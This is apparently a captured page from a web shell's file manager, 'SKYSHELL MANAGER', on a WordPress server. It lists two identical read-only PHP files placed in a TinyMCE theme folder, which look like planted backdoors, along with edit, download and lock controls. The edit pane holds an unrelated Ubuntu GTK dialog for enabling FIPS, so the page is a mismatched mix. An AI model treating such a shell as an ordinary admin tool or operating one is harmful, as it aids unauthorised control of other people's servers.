📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: dialog-ua-fips-enable.ui
<?xml version="1.0"?> <interface> <object class="GtkDialog" id="dialog_ua_fips_enable"> <property name="border_width">18</property> <property name="title" translatable="yes">Enable FIPS</property> <property name="resizable">False</property> <property name="modal">True</property> <property name="type_hint">dialog</property> <property name="skip_taskbar_hint">True</property> <child internal-child="vbox"> <object class="GtkBox"> <property name="orientation">vertical</property> <property name="spacing">18</property> <child> <object class="GtkBox"> <property name="visible">True</property> <property name="orientation">vertical</property> <property name="spacing">18</property> <child> <object class="GtkLabel"> <property name="visible">True</property> <property name="label" translatable="yes">Enabling FIPS cannot be reversed and Livepatch will be permanently disabled. Choose your preferred FIPS option.</property> <property name="xalign">0</property> </object> </child> <child> <object class="GtkRadioButton" id="radio_fips_with_updates"> <property name="visible">True</property> <child> <object class="GtkLabel"> <property name="visible">True</property> <property name="label" translatable="yes"><b>FIPS with updates</b> Installs FIPS 140-2 validated packages and allows for regular security updates.</property> <property name="use_markup">True</property> <property name="xalign">0</property> </object> </child> </object> </child> <child> <object class="GtkRadioButton"> <property name="visible">True</property> <property name="group">radio_fips_with_updates</property> <child> <object class="GtkLabel"> <property name="visible">True</property> <property name="label" translatable="yes"><b>FIPS without updates</b> Installs FIPS 140-2 validated packages. These will not be updated until the next recertification.</property> <property name="use_markup">True</property> <property name="xalign">0</property> </object> </child> </object> </child> </object> </child> </object> </child> <child internal-child="action_area"> <object class="GtkHButtonBox"> <property name="visible">True</property> <property name="layout_style">end</property> <child> <object class="GtkButton"> <property name="visible">True</property> <property name="label" translatable="yes">Cance_l</property> <property name="use_underline">True</property> <signal name="clicked" handler="on_cancel_clicked"/> </object> </child> <child> <object class="GtkButton"> <property name="visible">True</property> <property name="label" translatable="yes">_Continue</property> <property name="use_underline">True</property> <signal name="clicked" handler="on_continue_clicked"/> </object> </child> </object> </child> </object> </interface>
Save